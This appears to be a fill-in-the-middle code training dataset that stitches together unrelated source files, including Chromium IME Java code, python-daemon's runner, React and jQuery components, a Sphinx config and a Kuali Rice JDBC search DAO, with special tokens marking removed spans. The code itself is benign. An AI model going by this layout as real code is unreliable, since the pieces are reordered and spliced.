selectionStart; int availableAfter = mEditable.length() - selectionEnd; beforeLength = Math.min(beforeLength, availableBefore); afterLength = Math.min(afterLength, availableAfter); // Adjust these values even before calling super.deleteSurroundingText() to be consistent // with the super class. if (isIndexBetweenUtf16SurrogatePair(mEditable, selectionStart - beforeLength)) { beforeLength += 1; } if (isIndexBetweenUtf16SurrogatePair(mEditable, selectionEnd + afterLength)) { afterLength += 1; } super.deleteSurroundingText(beforeLength, afterLength); updateSelectionIfRequired(); // If this was called due to a physical key, no need to generate a key event here as // the caller will take care of forwarding the original. if (fromPhysicalKey) { return true; } // For single-char deletion calls |ImeAdapter.sendKeyEventWithKeyCode| with the real key // code. For multi-character deletion, executes deletion by calling // |ImeAdapter.deleteSurroundingText| and sends synthetic key events with a dummy key code. int keyCode = KeyEvent.KEYCODE_UNKNOWN; if (originalBeforeLength == 1 && originalAfterLength == 0) { keyCode = KeyEvent.KEYCODE_DEL; } else if (originalBeforeLength == 0 && originalAfterLength == 1) { keyCode = KeyEvent.KEYCODE_FORWARD_DEL; } boolean result = true; if (keyCode == KeyEvent.KEYCODE_UNKNOWN) { result = mImeAdapter.sendSyntheticKeyEvent( WebInputEventType.RawKeyDown, SystemClock.uptimeMillis(), keyCode, 0, 0); result &= mImeAdapter.deleteSurroundingText(beforeLength, afterLength); result &= mImeAdapter.sendSyntheticKeyEvent( WebInputEventType.KeyUp, SystemClock.uptimeMillis(), keyCode, 0, 0); } else { mImeAdapter.sendKeyEventWithKeyCode( keyCode, KeyEvent.FLAG_SOFT_KEYBOARD | KeyEvent.FLAG_KEEP_TOUCH_MODE); } return result; } /** * @see BaseInputConnection#sendKeyEvent(android.view.KeyEvent) */ @Override public boolean sendKeyEvent(KeyEvent event) { if (DEBUG) { Log.w(TAG, "sendKeyEvent [" + event.getAction() + "] [" + event.getKeyCode() + "] [" + event.getUnicodeChar() + "]"); } int action = event.getAction(); int keycode = event.getKeyCode(); int unicodeChar = event.getUnicodeChar(); // If this isn't a KeyDown event, no need to update composition state; just pass the key // event through and return. But note that some keys, such as enter, may actually be // handled on ACTION_UP in Blink. if (action != KeyEvent.ACTION_DOWN) { mImeAdapter.translateAndSendNativeEvents(event); return true; } // If this is backspace/del or if the key has a character representation, // need to update the underlying Editable (i.e. the local representation of the text // being edited). Some IMEs like Jellybean stock IME and Samsung IME mix in delete // KeyPress events instead of calling deleteSurroundingText. if (keycode == KeyEvent.KEYCODE_DEL) { deleteSurroundingTextImpl(1, 0, true); } else if (keycode == KeyEvent.KEYCODE_FORWARD_DEL) { deleteSurroundingTextImpl(0, 1, true); } else if (keycode == KeyEvent.KEYCODE_ENTER) { // Finish text composition when pressing enter, as that may submit a form field. // TODO(aurimas): remove this workaround when crbug.com/278584 is fixed. finishComposingText(); } else if ((unicodeChar & KeyCharacterMap.COMBINING_ACCENT) != 0) { // Store a pending accent character and make it the current composition. int pendingAccent = unicodeChar & KeyCharacterMap.COMBINING_ACCENT_MASK; StringBuilder builder = new StringBuilder(); builder.appendCodePoint(pendingAccent); setComposingText(builder.toString(), 1); mPendingAccent = pendingAccent; return true; } else if (mPendingAccent != 0 && unicodeChar != 0) { int combined = KeyEvent.getDeadChar(mPendingAccent, unicodeChar); if (combined != 0) { StringBuilder builder = new StringBuilder(); builder.appendCodePoint(combined); commitText(builder.toString(), 1); return true; } // Noncombinable character; commit the accent character and fall through to sending // the key event for the character afterwards. finishComposingText(); } replaceSelectionWithUnicodeChar(unicodeChar); mImeAdapter.translateAndSendNativeEvents(event); return true; } /** * Update the mEditable state to reflect what Blink will do in response to the KeyDown * for a unicode-mapped key event. * @param unicodeChar The Unicode character to update selection with. */ private void replaceSelectionWithUnicodeChar(int unicodeChar) { if (unicodeChar == 0) return; int selectionStart = Selection.getSelectionStart(mEditable); int selectionEnd = Selection.getSelectionEnd(mEditable); if (selectionStart > selectionEnd) { int temp = selectionStart; selectionStart = selectionEnd; selectionEnd = temp; } mEditable.replace(selectionStart, selectionEnd, Character.toString((char) unicodeChar)); updateSelectionIfRequired(); } /** * @see BaseInputConnection#finishComposingText() */ @Override public boolean finishComposingText() { if (DEBUG) Log.w(TAG, "finishComposingText"); mPendingAccent = 0; if (getComposingSpanStart(mEditable) == getComposingSpanEnd(mEditable)) { return true; } super.finishComposingText(); updateSelectionIfRequired(); mImeAdapter.finishComposingText(); return true; } /** * @see BaseInputConnection#setSelection(int, int) */ @Override public boolean setSelection(int start, int end) { if (DEBUG) Log.w(TAG, "setSelection [" + start + " " + end + "]"); int textLength = mEditable.length(); if (start < 0 || end < 0 || start > textLength || end > textLength) return true; super.setSelection(start, end); updateSelectionIfRequired(); return mImeAdapter.setEditableSelectionOffsets(start, end); } /** * Informs the InputMethodManager and InputMethodSession (i.e. the IME) that the text * state is no longer what the IME has and that it needs to be updated. */ void restartInput() { if (DEBUG) Log.w(TAG, "restartInput"); getInputMethodManagerWrapper().restartInput(mInternalView); mNumNestedBatchEdits = 0; mPendingAccent = 0; } /** * @see BaseInputConnection#setComposingRegion(int, int) */ @Override public boolean setComposingRegion(int start, int end) { if (DEBUG) Log.w(TAG, "setComposingRegion [" + start + " " + end + "]"); int textLength = mEditable.length(); int a = Math.min(start, end); int b = Math.max(start, end); if (a < 0) a = 0; if (b < 0) b = 0; if (a > textLength) a = textLength; if (b > textLength) b = textLength; if (a == b) { removeComposingSpans(mEditable); } else { super.setComposingRegion(a, b); } updateSelectionIfRequired(); CharSequence regionText = null; if (b > a) { regionText = mEditable.subSequence(a, b); } return mImeAdapter.setComposingRegion(regionText, a, b); } boolean isActive() { return getInputMethodManagerWrapper().isActive(mInternalView); } private InputMethodManagerWrapper getInputMethodManagerWrapper() { return mImeAdapter.getInputMethodManagerWrapper(); } /** * This method works around the issue crbug.com/373934 where Blink does not cancel * the composition when we send a commit with the empty text. * * TODO(aurimas) Remove this once crbug.com/373934 is fixed. * * @param text Text that software keyboard requested to commit. * @return Whether the workaround was performed. */ private boolean maybePerformEmptyCompositionWorkaround(CharSequence text) { int selectionStart = Selection.getSelectionStart(mEditable); int selectionEnd = Selection.getSelectionEnd(mEditable); int compositionStart = getComposingSpanStart(mEditable); int compositionEnd = getComposingSpanEnd(mEditable); if (TextUtils.isEmpty(text) && (selectionStart == selectionEnd) && compositionStart != INVALID_COMPOSITION && compositionEnd != INVALID_COMPOSITION) { beginBatchEdit(); finishComposingText(); int selection = Selection.getSelectionStart(mEditable); deleteSurroundingText(selection - compositionStart, selection - compositionEnd); endBatchEdit(); return true; } return false; } @VisibleForTesting static class ImeState { public final String text; public final int selectionStart; public final int selectionEnd; public final int compositionStart; public final int compositionEnd; public ImeState(String text, int selectionStart, int selectionEnd, int compositionStart, int compositionEnd) { this.text = text; this.selectionStart = selectionStart; this.selectionEnd = selectionEnd; this.compositionStart = compositionStart; this.compositionEnd = compositionEnd; } } @VisibleForTesting<|fim▁hole|> int selectionStart = Selection.getSelectionStart(mEditable); int selectionEnd = Selection.getSelectionEnd(mEditable); int compositionStart = getComposingSpanStart(mEditable); int compositionEnd = getComposingSpanEnd(mEditable); return new ImeState(text, selectionStart, selectionEnd, compositionStart, compositionEnd); } }<|fim▁end|>
ImeState getImeStateForTesting() { String text = mEditable.toString();
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>'''trec_dd.* namespace package can have several subpackages, see http://github.com/trec-dd for more info .. This software is released under an MIT/X11 open source license. Copyright 2015 Diffeo, Inc. '''<|fim▁hole|><|fim▁end|>
import pkg_resources pkg_resources.declare_namespace(__name__)
<|file_name|>runner.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # daemon/runner.py # Part of python-daemon, an implementation of PEP 3143. # # Copyright © 2009–2010 Ben Finney <[email protected]> # Copyright © 2007–2008 Robert Niederreiter, Jens Klein # Copyright © 2003 Clark Evans # Copyright © 2002 Noah Spurrier # Copyright © 2001 Jürgen Hermann # # This is free software: you may copy, modify, and/or distribute this work # under the terms of the Python Software Foundation License, version 2 or # later as published by the Python Software Foundation. # No warranty expressed or implied. See the file LICENSE.PSF-2 for details. """ Daemon runner library. """ import sys import os import signal import errno from . import pidlockfile from .daemon import DaemonContext if sys.version_info >= (3, 0): unicode = str basestring = str class DaemonRunnerError(Exception): """ Abstract base class for errors from DaemonRunner. """ class DaemonRunnerInvalidActionError(ValueError, DaemonRunnerError): """ Raised when specified action for DaemonRunner is invalid. """<|fim▁hole|>class DaemonRunnerStartFailureError(RuntimeError, DaemonRunnerError): """ Raised when failure starting DaemonRunner. """ class DaemonRunnerStopFailureError(RuntimeError, DaemonRunnerError): """ Raised when failure stopping DaemonRunner. """ class DaemonRunner(object): """ Controller for a callable running in a separate background process. The first command-line argument is the action to take: * 'start': Become a daemon and call `app.run()`. * 'stop': Exit the daemon process specified in the PID file. * 'restart': Stop, then start. """ start_message = "started with pid %(pid)d" def __init__(self, app): """ Set up the parameters of a new runner. The `app` argument must have the following attributes: * `stdin_path`, `stdout_path`, `stderr_path`: Filesystem paths to open and replace the existing `sys.stdin`, `sys.stdout`, `sys.stderr`. * `pidfile_path`: Absolute filesystem path to a file that will be used as the PID file for the daemon. If ``None``, no PID file will be used. * `pidfile_timeout`: Used as the default acquisition timeout value supplied to the runner's PID lock file. * `run`: Callable that will be invoked when the daemon is started. """ self.parse_args() self.app = app self.daemon_context = DaemonContext() self.daemon_context.stdin = open(app.stdin_path, 'r') self.daemon_context.stdout = open(app.stdout_path, 'wb+', buffering=0) self.daemon_context.stderr = open( app.stderr_path, 'wb+', buffering=0) self.pidfile = None if app.pidfile_path is not None: self.pidfile = make_pidlockfile( app.pidfile_path, app.pidfile_timeout) self.daemon_context.pidfile = self.pidfile def _usage_exit(self, argv): """ Emit a usage message, then exit. """ progname = os.path.basename(argv[0]) usage_exit_code = 2 action_usage = "|".join(self.action_funcs.keys()) message = "usage: %(progname)s %(action_usage)s" % vars() emit_message(message) sys.exit(usage_exit_code) def parse_args(self, argv=None): """ Parse command-line arguments. """ if argv is None: argv = sys.argv min_args = 2 if len(argv) < min_args: self._usage_exit(argv) self.action = unicode(argv[1]) if self.action not in self.action_funcs: self._usage_exit(argv) def _start(self): """ Open the daemon context and run the application. """ if is_pidfile_stale(self.pidfile): self.pidfile.break_lock() try: self.daemon_context.open() except pidlockfile.AlreadyLocked: pidfile_path = self.pidfile.path raise DaemonRunnerStartFailureError( "PID file %(pidfile_path)r already locked" % vars()) pid = os.getpid() message = self.start_message % vars() emit_message(message) self.app.run() def _terminate_daemon_process(self): """ Terminate the daemon process specified in the current PID file. """ pid = self.pidfile.read_pid() try: os.kill(pid, signal.SIGTERM) except OSError as exc: raise DaemonRunnerStopFailureError( "Failed to terminate %(pid)d: %(exc)s" % vars()) def _stop(self): """ Exit the daemon process specified in the current PID file. """ if not self.pidfile.is_locked(): pidfile_path = self.pidfile.path raise DaemonRunnerStopFailureError( "PID file %(pidfile_path)r not locked" % vars()) if is_pidfile_stale(self.pidfile): self.pidfile.break_lock() else: self._terminate_daemon_process() def _restart(self): """ Stop, then start. """ self._stop() self._start() action_funcs = { 'start': _start, 'stop': _stop, 'restart': _restart, } def _get_action_func(self): """ Return the function for the specified action. Raises ``DaemonRunnerInvalidActionError`` if the action is unknown. """ try: func = self.action_funcs[self.action] except KeyError: raise DaemonRunnerInvalidActionError( "Unknown action: %(action)r" % vars(self)) return func def do_action(self): """ Perform the requested action. """ func = self._get_action_func() func(self) def emit_message(message, stream=None): """ Emit a message to the specified stream (default `sys.stderr`). """ if stream is None: stream = sys.stderr stream.write("%(message)s\n" % vars()) stream.flush() def make_pidlockfile(path, acquire_timeout): """ Make a PIDLockFile instance with the given filesystem path. """ if not isinstance(path, basestring): error = ValueError("Not a filesystem path: %(path)r" % vars()) raise error if not os.path.isabs(path): error = ValueError("Not an absolute path: %(path)r" % vars()) raise error lockfile = pidlockfile.TimeoutPIDLockFile(path, acquire_timeout) return lockfile def is_pidfile_stale(pidfile): """ Determine whether a PID file is stale. Return ``True`` (“stale”) if the contents of the PID file are valid but do not match the PID of a currently-running process; otherwise return ``False``. """ result = False pidfile_pid = pidfile.read_pid() if pidfile_pid is not None: try: os.kill(pidfile_pid, signal.SIG_DFL) except OSError as exc: if exc.errno == errno.ESRCH: # The specified PID does not exist result = True return result<|fim▁end|>
<|file_name|>index.tsx<|end_file_name|><|fim▁begin|>/* * * TagsBar * */ import { FC } from 'react' import { keys, reverse } from 'ramda' import { pluggedIn } from '@/utils/mobx' import { buildLog } from '@/utils/logger' import type { TProps as TTagProps } from '../index' import GobackTag from './GobackTag' import Folder from './Folder' import { Wrapper } from '../styles/desktop_view' import { useInit, onTagSelect } from '../logic' /* eslint-disable-next-line */ const log = buildLog('C:TagsBar') type TProps = Omit<TTagProps, 'view'> const TagsBarContainer: FC<TProps> = ({ tagsBar: store, onSelect }) => { useInit(store) const { groupedTags, tagsData, activeTagData, maxDisplayCount, totalCountThrold, } = store const groupsKeys = reverse(keys(groupedTags)) as string[] return ( <Wrapper> {activeTagData.title && ( <GobackTag onSelect={(tag) => { onTagSelect(tag) onSelect?.() }} /><|fim▁hole|> title={groupKey} groupTags={groupedTags[groupKey]} allTags={tagsData} activeTag={activeTagData} maxDisplayCount={maxDisplayCount} totalCountThrold={totalCountThrold} onSelect={(tag) => { onTagSelect(tag) onSelect?.() }} /> ))} </Wrapper> ) } export default pluggedIn(TagsBarContainer) as FC<TProps><|fim▁end|>
)} {groupsKeys.map((groupKey) => ( <Folder key={groupKey}
<|file_name|>models.js<|end_file_name|><|fim▁begin|>define(function(require, exports) { 'use strict'; var Backbone = require('backbone') , global = require('global'); var teamColours = [ '#FFBBBB', '#FFE1BA', '#FDFFBA', '#D6FFBA', '#BAFFCE', '#BAFFFD', '#BAE6FF', '#BAC8FF', '#D3BAFF', '#EBBAFF', '#E4E0FF', '#BAFCE1', '#FCC6BB', '#E3F3CE', '#EEEEEE', '#D8FFF4' ]; exports.Problem = Backbone.Model.extend({}); exports.Team = Backbone.Model.extend({ colour: function() { return teamColours[this.id % teamColours.length]; } }); exports.Stage = Backbone.Model.extend({ glyphs: { 1: 'remove',<|fim▁hole|> 2: 'ok', 3: 'forward' }, glyph: function() { return this.glyphs[this.get('state')]; } }); });<|fim▁end|>
<|file_name|>conf.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- # # nukebox2000 documentation build configuration file, created by # sphinx-quickstart on Tue Jul 9 22:26:36 2013. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another # directory, add these directories to sys.path here. If the directory is # relative to the documentation root, use os.path.abspath to make it # absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) # Get the project root dir, which is the parent dir of this cwd = os.getcwd() project_root = os.path.dirname(cwd) # Insert the project root dir as the first element in the PYTHONPATH. # This lets us ensure that the source package is imported, and that its # version is used. sys.path.insert(0, project_root) import nukebox2000 # -- General configuration --------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'NukeBox2000' copyright = u"2016, Darren Dowdall" # The version info for the project you're documenting, acts as replacement # for |version| and |release|, also used in various other places throughout # the built documents. # # The short X.Y version. version = nukebox2000.__version__ # The full version, including alpha/beta/rc tags. release = nukebox2000.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to # some non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built # documents. #keep_warnings = False # -- Options for HTML output ------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'default' # Theme options are theme-specific and customize the look and feel of a # theme further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as # html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the # top of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon # of the docs. This file should be a Windows icon file (.ico) being # 16x16 or 32x32 pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) # here, relative to this directory. They are copied after the builtin # static files, so a file named "default.css" will overwrite the builtin # "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names # to template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. # Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. # Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages # will contain a <link> tag referring to it. The value of this option # must be the base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'nukebox2000doc' # -- Options for LaTeX output ------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper',<|fim▁hole|> #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [ ('index', 'nukebox2000.tex', u'NukeBox2000 Documentation', u'Darren Dowdall', 'manual'), ] # The name of an image file (relative to this directory) to place at # the top of the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings # are parts, not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output ------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'nukebox2000', u'NukeBox2000 Documentation', [u'Darren Dowdall'], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ---------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ('index', 'nukebox2000', u'NukeBox2000 Documentation', u'Darren Dowdall', 'nukebox2000', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False<|fim▁end|>
# The font size ('10pt', '11pt' or '12pt').
<|file_name|>duty_notice.js<|end_file_name|><|fim▁begin|>define((require, exports, module) => { return (store) => { store.subscribe((mutation, state) => { if (mutation.type === 'duty/updateDuty') { let { finished_at, horse_id2, horse_id1, field_id1, field_id2, bout_id1, bout_id2, param} = mutation.payload.updateData if(param){ let paramResult = { horse_id1: '', horse_id2: '', field_id1: '', field_id2: '', bout_id1: '', bout_id2: '' } _.each(paramResult, (v, k)=>{ if(mutation.payload.updateData[k]){ up_type = param[mutation.payload.updateData[k]].up_type is_max = param[mutation.payload.updateData[k]].is_max up_value = param[mutation.payload.updateData[k]].up_value valueResult = is_max ? 'MAX' : '+'+ up_value typeResult = ['機動', '統率', '偵察', '生存', '打撃', '衝力'][up_type-1] paramResult[k]='('+typeResult+valueResult+')' } }) if(finished_at){ store.commit('log/addDutyLog', { logId: `${moment(parseValues(finished_at)).unix()}`, finished_at: finished_at, horse_id2: horse_id2, horse_id1: horse_id1, field_id1: field_id1, field_id2: field_id2, bout_id1: bout_id1, bout_id2: bout_id2, param: paramResult })}}else{ if(finished_at){ store.commit('log/addDutyLog', { logId: `${moment(parseValues(finished_at)).unix()}`, finished_at: finished_at, horse_id2: horse_id2, horse_id1: horse_id1, field_id1: field_id1, field_id2: field_id2, bout_id1: bout_id1, bout_id2: bout_id2 }) }} //if (state.config.duty_notice == true) { if(_.every([horse_id1, horse_id2, field_id1, field_id2, bout_id1, bout_id2], _.isNull) || JSON.stringify(mutation.payload.updateData)=="{}" || JSON.stringify(mutation.payload.updateData)=="[]") { state.duty['status']=1 } else if (!finished_at) { finished_at = state.duty.finished_at state.duty['status']=2 } else{ state.duty['status']=2 } if(state.duty.isIntervalSet == false || state.duty.isIntervalSet == null) { //console.log("set interval") let check = setInterval(function isDutyFinished(){ state.duty.isIntervalSet = true state.duty.left_time = moment.utc(state.duty.finished_at-Date.now()).format('HH:mm:ss') if(finished_at != null && moment(parseValues(finished_at)).isBefore(Date.now()) && state.duty.status==2) { state.duty.left_time = '00:00:00' if (state.config.duty_notice == true) { store.dispatch('notice/addNotice', { title: `内番结束!`, message: `结束时间:${moment(parseValues(finished_at)).format('HH:mm:ss')}`, context: '请尽快收取!', renotify: true, disableAutoClose: true,<|fim▁hole|> swordBaseId: state.swords.serial[state.party.parties[1].slot[1].serial_id].sword_id, icon: `static/sword/${state.swords.serial[state.party.parties[1].slot[1].serial_id].sword_id}.png` })} state.duty.isIntervalSet = false clearInterval(check) } if(state.duty['status'] != 2){ state.duty.isNoticed = false state.duty.isIntervalSet = false clearInterval(check) } }, 1000) } //} } }) } })<|fim▁end|>
<|file_name|>bulkselect-table.js<|end_file_name|><|fim▁begin|>(function($){ $.applyBulkSelectTable = function(obj, settings) {<|fim▁hole|> lastClickedChecked = false, lastClickedIndex = null; var applyClass = function(obj, className, checked) { if(checked) obj.addClass(className); else obj.removeClass(className); }; obj.on('click', '.'+settings.selectAllClass, function(e) { var checked = $(this).is(':checked'), items = obj.find('.'+settings.checkboxClass); items.prop('checked', checked); if(checked) items.parents(settings.parentTag).addClass(settings.selectedClass); else items.parents(settings.parentTag).removeClass(settings.selectedClass); }); obj.on('click', '.'+settings.checkboxClass, function(e) { var o = $(e.target); clickingElement = o; clickingChecked = o.is(':checked'); clickingIndex = o.parents(settings.parentTag).index(); applyClass(clickingElement.parents(settings.parentTag), settings.selectedClass, clickingChecked); if(e.shiftKey && lastClickedElement!==null) { var list, start, end; if(lastClickedIndex < clickingIndex) { start = lastClickedElement.parents(settings.parentTag); end = clickingElement.parents(settings.parentTag); list = start.nextUntil(end); } else if(lastClickedIndex > clickingIndex) { start = lastClickedElement.parents(settings.parentTag); end = clickingElement.parents(settings.parentTag); list = start.prevUntil(end); } lastClickedElement.prop('checked', clickingChecked); applyClass(start, settings.selectedClass, clickingChecked); list.find('.'+settings.checkboxClass).prop('checked', clickingChecked); applyClass(list, settings.selectedClass, clickingChecked); obj.trigger(clickingChecked ? 'bulk-select' : 'bulk-deselect', { 'start': start, 'end': end, 'list': list, 'applied': Math.abs(clickingIndex-lastClickedIndex+1) }); } lastClickedElement = clickingElement; lastClickedChecked = clickingChecked; lastClickedIndex = clickingIndex; }); }; $.fn.bulkSelectTable = function(options) { var settings = $.extend({ selectAllClass: 'selectall', checkboxClass: 'selectable', selectedClass: 'selected', parentTag: 'tr' }, options); return this.each(function(){ $.applyBulkSelectTable($(this), settings); }); }; }(jQuery));<|fim▁end|>
var lastClickedElement = null,
<|file_name|>DocumentSearchDAOJdbcImpl.java<|end_file_name|><|fim▁begin|>/** * Copyright 2005-2014 The Kuali Foundation * * Licensed under the Educational Community License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.opensource.org/licenses/ecl2.php * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kuali.rice.kew.docsearch.dao.impl; import java.sql.Connection; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.util.List; import javax.sql.DataSource; import org.apache.commons.lang.StringUtils; import org.kuali.rice.core.api.uif.RemotableAttributeField; import org.kuali.rice.coreservice.framework.CoreFrameworkServiceLocator; import org.kuali.rice.kew.api.KewApiConstants; import org.kuali.rice.kew.api.document.search.DocumentSearchCriteria; import org.kuali.rice.kew.api.document.search.DocumentSearchResults; import org.kuali.rice.kew.docsearch.dao.DocumentSearchDAO; import org.kuali.rice.kew.impl.document.search.DocumentSearchGenerator; import org.kuali.rice.kew.util.PerformanceLogger; import org.kuali.rice.krad.util.KRADConstants; import org.springframework.dao.DataAccessException; import org.springframework.jdbc.core.ConnectionCallback; import org.springframework.jdbc.core.JdbcTemplate; import org.springframework.jdbc.datasource.TransactionAwareDataSourceProxy; /** * Spring JdbcTemplate implementation of DocumentSearchDAO * * @author Kuali Rice Team ([email protected]) * */ public class DocumentSearchDAOJdbcImpl implements DocumentSearchDAO { public static final org.apache.log4j.Logger LOG = org.apache.log4j.Logger.getLogger(DocumentSearchDAOJdbcImpl.class); private static final int DEFAULT_FETCH_MORE_ITERATION_LIMIT = 10; private DataSource dataSource; public void setDataSource(DataSource dataSource) { this.dataSource = new TransactionAwareDataSourceProxy(dataSource); } @Override public DocumentSearchResults.Builder findDocuments(final DocumentSearchGenerator documentSearchGenerator, final DocumentSearchCriteria criteria, final boolean criteriaModified, final List<RemotableAttributeField> searchFields) { final int maxResultCap = getMaxResultCap(criteria); try { final JdbcTemplate template = new JdbcTemplate(dataSource); return template.execute(new ConnectionCallback<DocumentSearchResults.Builder>() { @Override public DocumentSearchResults.Builder doInConnection(final Connection con) throws SQLException { final Statement statement = con.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); try { final int fetchIterationLimit = getFetchMoreIterationLimit(); final int fetchLimit = fetchIterationLimit * maxResultCap;<|fim▁hole|> String sql = documentSearchGenerator.generateSearchSql(criteria, searchFields); perfLog.log("Time to generate search sql from documentSearchGenerator class: " + documentSearchGenerator .getClass().getName(), true); LOG.info("Executing document search with statement max rows: " + statement.getMaxRows()); LOG.info("Executing document search with statement fetch size: " + statement.getFetchSize()); perfLog = new PerformanceLogger(); final ResultSet rs = statement.executeQuery(sql); try { perfLog.log("Time to execute doc search database query.", true); final Statement searchAttributeStatement = con.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); try { return documentSearchGenerator.processResultSet(criteria, criteriaModified, searchAttributeStatement, rs, maxResultCap, fetchLimit); } finally { try { searchAttributeStatement.close(); } catch (SQLException e) { LOG.warn("Could not close search attribute statement."); } } } finally { try { rs.close(); } catch (SQLException e) { LOG.warn("Could not close result set."); } } } finally { try { statement.close(); } catch (SQLException e) { LOG.warn("Could not close statement."); } } } }); } catch (DataAccessException dae) { String errorMsg = "DataAccessException: " + dae.getMessage(); LOG.error("getList() " + errorMsg, dae); throw new RuntimeException(errorMsg, dae); } catch (Exception e) { String errorMsg = "LookupException: " + e.getMessage(); LOG.error("getList() " + errorMsg, e); throw new RuntimeException(errorMsg, e); } } /** * Returns the maximum number of results that should be returned from the document search. * * @param criteria the criteria in which to check for a max results value * @return the maximum number of results that should be returned from a document search */ public int getMaxResultCap(DocumentSearchCriteria criteria) { int systemLimit = KewApiConstants.DOCUMENT_LOOKUP_DEFAULT_RESULT_CAP; String resultCapValue = CoreFrameworkServiceLocator.getParameterService().getParameterValueAsString(KewApiConstants.KEW_NAMESPACE, KRADConstants.DetailTypes.DOCUMENT_SEARCH_DETAIL_TYPE, KewApiConstants.DOC_SEARCH_RESULT_CAP); if (StringUtils.isNotBlank(resultCapValue)) { try { int configuredLimit = Integer.parseInt(resultCapValue); if (configuredLimit <= 0) { LOG.warn(KewApiConstants.DOC_SEARCH_RESULT_CAP + " was less than or equal to zero. Please use a positive integer."); } else { systemLimit = configuredLimit; } } catch (NumberFormatException e) { LOG.warn(KewApiConstants.DOC_SEARCH_RESULT_CAP + " is not a valid number. Value was " + resultCapValue + ". Using default: " + KewApiConstants.DOCUMENT_LOOKUP_DEFAULT_RESULT_CAP); } } int maxResults = systemLimit; if (criteria.getMaxResults() != null) { int criteriaLimit = criteria.getMaxResults().intValue(); if (criteriaLimit > systemLimit) { LOG.warn("Result set cap of " + criteriaLimit + " is greater than system value of " + systemLimit); } else { if (criteriaLimit < 0) { LOG.warn("Criteria results limit was less than zero."); criteriaLimit = 0; } maxResults = criteriaLimit; } } return maxResults; } public int getFetchMoreIterationLimit() { int fetchMoreLimit = DEFAULT_FETCH_MORE_ITERATION_LIMIT; String fetchMoreLimitValue = 